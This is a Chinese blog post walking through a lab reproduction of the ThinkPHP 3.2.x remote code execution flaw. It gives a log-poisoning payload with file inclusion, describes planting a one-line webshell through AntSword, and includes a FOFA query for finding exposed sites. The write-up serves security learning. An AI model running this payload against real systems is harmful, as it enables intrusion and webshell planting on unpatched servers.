thinkphp3.2.x 代码执行

最新推荐文章于 2024-09-26 13:53:30 发布
最新推荐文章于 2024-09-26 13:53:30 发布
阅读量474 收藏 1
点赞数 3
分类专栏: # 命令执行 文章标签: 安全 web安全 安全性测试 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140443396
版权

一、漏洞概述

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。 

二、影响范围

ThinkPHP3.2.X

三、漏洞复现

1、构造payload:/index.php?m=--><?=phpinfo();?>让程序报错

2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。

3、获取flag,上传一句话木马。

使用中国蚁剑等工具连接,地址为http://123.58.224.8:16186/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log

查看flag

四、漏洞利用

1、fofa:body="ThinkPHP3.2.3"

风中追风-fzzf
关注
专栏目录
ThinkPHP 3.2.x RCE漏洞复现
m0_46616663的博客
11-29 2291
打湖湘杯遇到一个类似的willphp题目,都审到cfile了没做出来。。。于是把这个翻出来搞了一波,过程参考了网上别的师傅的0.0 什么是ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不
Vulfocus通关---thinkphp3.2.x 代码执行
RanQ的博客
09-15 477
vulfocus的tp漏洞通关小白手把手教程
[vulfocus] thinkphp3.2.x 代码执行
最新发布
weixin_45686785的博客
09-26 145
其中,24_09_26改成相对应的日期。访问给的IP,抓包重放。
vulfocus——thinkphp3.2.x代码执行
m0_62063669的博客
10-01 2099
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。22_10_01是复现的日期,根据自己的时间做调整。
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2294
thinkphp-命令执行】日志包含
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
thinkphp3.2.x rce
12-18
这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个...
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链1
08-03
ThinkPHP v3.2.X 反序列化漏洞与SQL注入及文件读取利用分析》 ThinkPHP是一款广泛使用的PHP框架,其3.2.*版本存在反序列化漏洞,允许攻击者通过精心构造的数据包触发特定行为,如SQL注入和文件读取。本文将深入...
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp 代码执行 (CNVD-2018-24942)
weixin_48900801的博客
07-29 372
thinkphp 代码执行 (CNVD-2018-24942) 漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp /index.php/?s=index/\think\app/invokefunction&fu
ThinkPHP3.2.x 代码执行漏洞
guishengyx的博客
10-19 1917
vulfocus靶场
热门框架漏洞--ThinkPHP代码执行
jxy158212的博客
02-21 705
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
thinkphp框架远程代码执行
m0_68976043的博客
07-29 515
一定添加--privileged不然只能拉取环境首页不显示。二、thinkphp远程代码执行。vulfocus网上自行下载。
thinkphp-2x-rce 代码执行
yzl_007的博客
09-19 413
thinkphp-2x-rce 代码执行 打开环境 漏洞描述 ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 。 在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = pre
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1155
thinkphp3.2.3 代码执行
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值